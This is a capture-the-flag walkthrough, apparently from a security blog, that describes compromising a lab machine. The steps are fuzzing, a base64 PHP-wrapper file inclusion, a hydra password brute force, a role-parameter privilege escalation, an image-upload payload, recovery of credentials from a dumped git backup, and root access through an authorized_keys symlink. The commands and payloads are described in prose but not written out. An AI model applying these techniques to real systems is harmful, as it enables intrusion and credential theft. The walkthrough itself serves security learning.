We first scan the box with nmap to find which ports are open and which services running on those ports.
-sV: to detect service versions
We get back the following result showing that three ports are open.
- Port 22 is used for SSH service
- Port 80 is used for HTTP service
We visit the main page. A login panel is welcoming us.
Nothing interesting in the source page.
We try some default credentials but does not work out.
We run a ffuf scan.
And get some results.
Let’s visit image.php
The image.php does not give us any error or redirect, just like white paper. This looks suspicious and it might accept some get or post parameter.
We must find the right parameter. Wfuzz will help us on this.
Ups. Weird. Let’s filter them out.
Cool! We get a parameter.
We are detected..
There is blacklist so let’s try php wrapping with base64.
And it works.
Decode base64.
We successfully dump the /etc/passwd.
Filtering out unnecessary things.
Now, we have a user named “aaron”
We find the password of user aaron after brute forcing with hydra.
Let’s login.
Nothing seems interesting except logged in as user 2. Who is user 1?
Let’s check the source code of profile.php
The data is sent to /profile_update.php
We get the source code of profile_update.php
The source shows that it is required to have the four parameters. It also updates the role which is not available in the form.
We update the personal info that is not necessary. Open up FoxyProxy and send the request to BurpSuite.
Let’s add &role=1 to the POST body and forward the request.
Okay. The profile was updated.
When we refresh the page we see the “Admin panel” in menu bar.
Time to check the source code of upload.php file. There is a time() function which get the dynamic value. It is saved in $file_hash and the string “$file_hash” is concatenated with time() value. Note that $file_hash is interpreted as a string because it is using a single cot rather than double cot.
The dummy jpg file which has our injected payload is ready.
And the exploit code is ready.
We first run the exploit then upload the pika17.jpg file. The results will be saving in muck.txt file.
We have now specific file names. One of them is pika17.jpg file literally. Just the name is different because of the interpretation we have seen on upload.php source code.
We use curl tool in order to get the right file. And one of the is the one we are looking for. We see that our payload get us the result of id command successfully.
We try it on the browser.
We are unfortunately unable to get reverse shell in this phase. So that, we enumerate the box manually.
After some directory enumeration we see a backup file on /opt directory. How can we investigate this file? Well we can try to download the file if we copy the file to the /var/www/html directory.
We copy it to the /var/www/html.
Cool! After navigate the specified URL we are able to download the file.
Let’s unzip it.
At the first glance, .git file takes the attention, right?
We will be using gitdumper.sh script.
This is a tool for downloading .git repositories from webservers which do not have directory listing enabled.
https://github.com/internetwache/GitTools/blob/master/Dumper/gitdumper.sh
We start a web server locally.
We run the script.
Hmm some deleted files. It looks casual but always good to search around.
Voila. We get something useful, credentials.
We go with the deleted one and logged in as user aaron successfully.
Perfect. We get our first flag.
We see that user aaron can execute netutils with root permission.
Let’s run the code in order to see what is going on.
What if it is a tool that we simply can download our super cool things inside of the box.
Let’s test first.
We downloaded the test file.
Yeap! It worked.
Let’s be straightforward to get root. We will get our public key and upload to the box. After that we will create a symlink of /root/.ssh/authorized_keys with pub_key so that our public key (called pub_key) will be added to authorized_keys directly.
We create the symlink as we mentioned.
And our public key is ready to be downloaded.
Let’s run netutils and download the public key.
Perfect! We are able to login in as root user just right after.
And get the root flag successfully.
Thank you for your time.
Cyber Security Blog 